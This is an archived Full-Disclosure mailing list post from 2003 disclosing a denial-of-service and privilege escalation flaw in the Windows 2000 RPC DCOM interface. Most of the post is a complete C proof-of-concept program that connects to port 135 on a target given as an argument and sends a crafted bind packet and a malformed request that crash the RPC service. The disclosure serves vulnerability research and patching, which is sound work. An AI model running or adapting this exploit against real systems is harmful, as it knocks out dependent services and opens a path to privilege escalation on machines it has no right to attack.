[Full-Disclosure] Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability

From: benjurry (benjurry_at_xfocus.org)
Date: 07/21/03

Next message: tcpdumb: "Re: [Full-Disclosure] Cisco exploit"

Previous message: bugzilla_at_redhat.com: "[Full-Disclosure] [RHSA-2003:162-02] Updated Mozilla packages fix security vulnerability."
In reply to: Curious ByStander: "Re: [Full-Disclosure] Secunia - Delaying information again!"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: <full-disclosure@lists.netsys.com>
Date: Mon, 21 Jul 2003 23:53:03 +0800

Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability

1.Description:
There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The failure results because of incorrect handling of malformed messages.
By sending a messages to DCOM __RemoteGetClassObject interface,The RPC Service will be crashed,and all service and application depending on RPC service will be abnormal.
The reason for this is that __RemoteGetClassObject intface passed a NULL point to PerformScmStage Function;
If attacker have an account ,he can hijack epmapper pipe and 135 port Privilege Escalation after RPC service is crash.

2.Affected Systems:Windows 2000 +SP3
Windows 2000 +SP4+MS03-026 HotFix

3.Proof of concept codes:
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

void main(int argc,char ** argv)
{
    WSADATA WSAData;
int i;
    SOCKET sock;
    SOCKADDR_IN addr_in;

short port=135;
unsigned char buf1[0x1000];
printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");
printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfocus.org\n");
printf("Welcome to http://www.xfocus.net\n");
if(argc<2)
{
  printf("useage:%s target\n",argv[0]);
exit(1);
}

    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return;
    }
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
  printf("Connect failed.Error:%d",WSAGetLastError());
  return;
}
if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
{
   printf("Send failed.Error:%d\n",WSAGetLastError());
   return;
}

i=recv(sock,buf1,1024,MSG_PEEK);
if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
}

4.Author:flashsky@xfocus.org
  e-mail:
   fangxing@venustech.com.cn
   flashsky@xfocus.org

Thanks Benjerry@xfocus.org for testing and translation.

Welcome visit our www site:
http://www.xfocus.org
http://www.venustech.com.cn
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: tcpdumb: "Re: [Full-Disclosure] Cisco exploit"

Previous message: bugzilla_at_redhat.com: "[Full-Disclosure] [RHSA-2003:162-02] Updated Mozilla packages fix security vulnerability."
In reply to: Curious ByStander: "Re: [Full-Disclosure] Secunia - Delaying information again!"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability
... There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. ... By sending a malformed messages to DCOM __RemoteGetClassObject interface,The RPC Service will be crashed,and all service and application depending on RPC service will be abnormal. ...
(Bugtraq)
[NT] Buffer Overrun in RPC Interface Could Allow Code Execution
... to promote the most advanced vulnerability assessment solutions today. ... Remote Procedure Call (RPC) is a protocol used by the Windows operating ... The attacker would be able to take any action on the system, ...
(Securiteam)
Re: [Full-Disclosure] EEYE: Microsoft RPC Heap Corruption Vulnerability - Part II
... number as the one they release for the previous RPC exploit, ... Microsoft RPC Heap Corruption Vulnerability - Part II ... Microsoft Windows NT Workstation 4.0 ... By sending a malformed request packet it is possible to overwrite various ...
(Full-Disclosure)
[NT] Vulnerability in RPC Allows Denial of Service (MS07-058)
... Get your security news from a reliable source. ... Vulnerability in RPC Allows Denial of Service ... A denial of service vulnerability exists in the remote procedure call ... Microsoft Windows 2000 Service Pack 4 ...
(Securiteam)
[NT] Flaw in Services for UNIX 3.0 Interix SDK Could Allow Code Execution
... Sun RPC library from the Interix SDK need to evaluate three ... An attacker could send a malicious RPC request to the ... RPC server from a remote machine and cause corruption in the server ... The second vulnerability is a buffer overrun. ...
(Securiteam)